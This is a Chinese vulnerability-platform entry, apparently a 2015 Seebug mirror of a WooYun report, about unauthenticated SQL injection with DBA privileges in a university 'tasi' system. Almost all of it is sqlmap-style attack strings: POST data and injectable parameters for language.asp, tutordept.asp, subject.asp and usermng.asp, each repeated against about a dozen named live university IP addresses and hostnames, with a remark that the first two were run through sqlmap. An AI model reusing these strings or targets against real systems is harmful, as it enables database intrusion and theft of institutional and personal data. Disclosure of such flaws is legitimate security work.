某高校在用系统SQL注入(DBA)(无需登录)2-5

2015-04-08T00:00:00
ID SSV:95485
Type seebug
Reporter Root
Modified 2015-04-08T00:00:00

Description

简要描述:

··

详细说明:

WooYun: 某高校在用系统sql注入(打包)(DBA)(无需登录)2 上一发 注入文件参数:language.asp editLangCode 案例 202.195.243.37/tasi/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode

202.120.121.200/tasi/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode pss.uestc.edu.cn/tasi/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode 202.203.222.222/tasi/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode 218.242.146.229/tasi/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode 202.193.70.164/TASi/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode 202.120.227.60/tasi/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode 59.72.151.17:8000/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode 202.197.127.125/tasi/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode 218.199.187.117:8080/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode 202.119.83.2/apatasi30/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode 218.242.146.229/tasi/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode 前两个丢进Sqlmap

<img src="https://images.seebug.org/upload/201504/041851343cf6a5757f52e1e83706dac91dc10678.png" alt="屏幕截图(1112).png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201504/04185144b366fa2dae4234a1e108e5508d67d51d.png" alt="屏幕截图(1113).png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201504/04185231b8f5edcb4d537406c8313762bd520c99.png" alt="屏幕截图(1114).png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201504/04185239dec97486c043b0e338b557d5efee32f2.png" alt="屏幕截图(1115).png" width="600" onerror="javascript:errimg(this);">

注入文件参数:tutordept.asp txtDeptName 案例 202.195.243.37/tasi/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName

202.120.121.200/tasi/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName pss.uestc.edu.cn/tasi/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName 202.203.222.222/tasi/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName 218.242.146.229/tasi/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName 202.193.70.164/TASi/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName 202.120.227.60/tasi/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName 59.72.151.17:8000/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName 202.197.127.125/tasi/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName 218.199.187.117:8080/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName 202.119.83.2/apatasi30/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName 218.242.146.229/tasi/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName 前两个丢进sqlmap

<img src="https://images.seebug.org/upload/201504/0419010739e59103d36633cfb31c9f6c5737982a.png" alt="屏幕截图(1116).png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201504/04190117d4641a3c44b7055a5420da3f4cde304c.png" alt="屏幕截图(1117).png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201504/04190126b7ba66013207a6b8a9def0a9e997bfd4.png" alt="屏幕截图(1118).png" width="600" onerror="javascript:errimg(this);">

WooYun: 某高校在用系统sql注入(打包)(DBA)(无需登录)2 上一个 注入文件参数:subject.asp editSClassName
案例 202.195.243.37/tasi/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName

202.120.121.200/tasi/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName
pss.uestc.edu.cn/tasi/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName
202.203.222.222/tasi/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName
218.242.146.229/tasi/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName
202.193.70.164/TASi/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName
202.120.227.60/tasi/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName
59.72.151.17:8000/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName
202.197.127.125/tasi/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName
218.199.187.117:8080/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName
202.119.83.2/apatasi30/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName
218.242.146.229/tasi/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName
前两个丢进sqlmap

<img src="https://images.seebug.org/upload/201504/04192235413653ae4f69cc595ba862b940f37249.png" alt="屏幕截图(1119).png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201504/04192244d3456e6eca685704a783a1336f4c8e66.png" alt="屏幕截图(1120).png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201504/041922522d2be922a362bc9e39bcc0bf71e49155.png" alt="屏幕截图(1121).png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201504/0419230312a643d3f6632594824f02c61c5e890e.png" alt="屏幕截图(1122).png" width="600" onerror="javascript:errimg(this);">

WooYun: 某高校在用系统sql注入(打包)(DBA)(无需登录)2 上一个 注入文件参数:usermng.asp txtLogin 案例 202.195.243.37/tasi/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin

202.120.121.200/tasi/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin pss.uestc.edu.cn/tasi/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin 202.203.222.222/tasi/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin 218.242.146.229/tasi/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin 202.193.70.164/TASi/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin 202.120.227.60/tasi/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin 59.72.151.17:8000/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin 202.197.127.125/tasi/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin 218.199.187.117:8080/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin 202.119.83.2/apatasi30/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin 218.242.146.229/tasi/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin 前两个sqlmap的结果

<img src="https://images.seebug.org/upload/201504/04193148feadca08d83596fd8f27294f56933afa.png" alt="屏幕截图(1123).png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201504/041931570a26b5cc71377629b4ccfe084d343fd7.png" alt="屏幕截图(1124).png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201504/041932073d03004b0135a00b60bc335a8304ed1e.png" alt="屏幕截图(1125).png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201504/0419321742a68715c04d6d14b4ead2ff9dfcf2b3.png" alt="屏幕截图(1126).png" width="600" onerror="javascript:errimg(this);">

漏洞证明:

···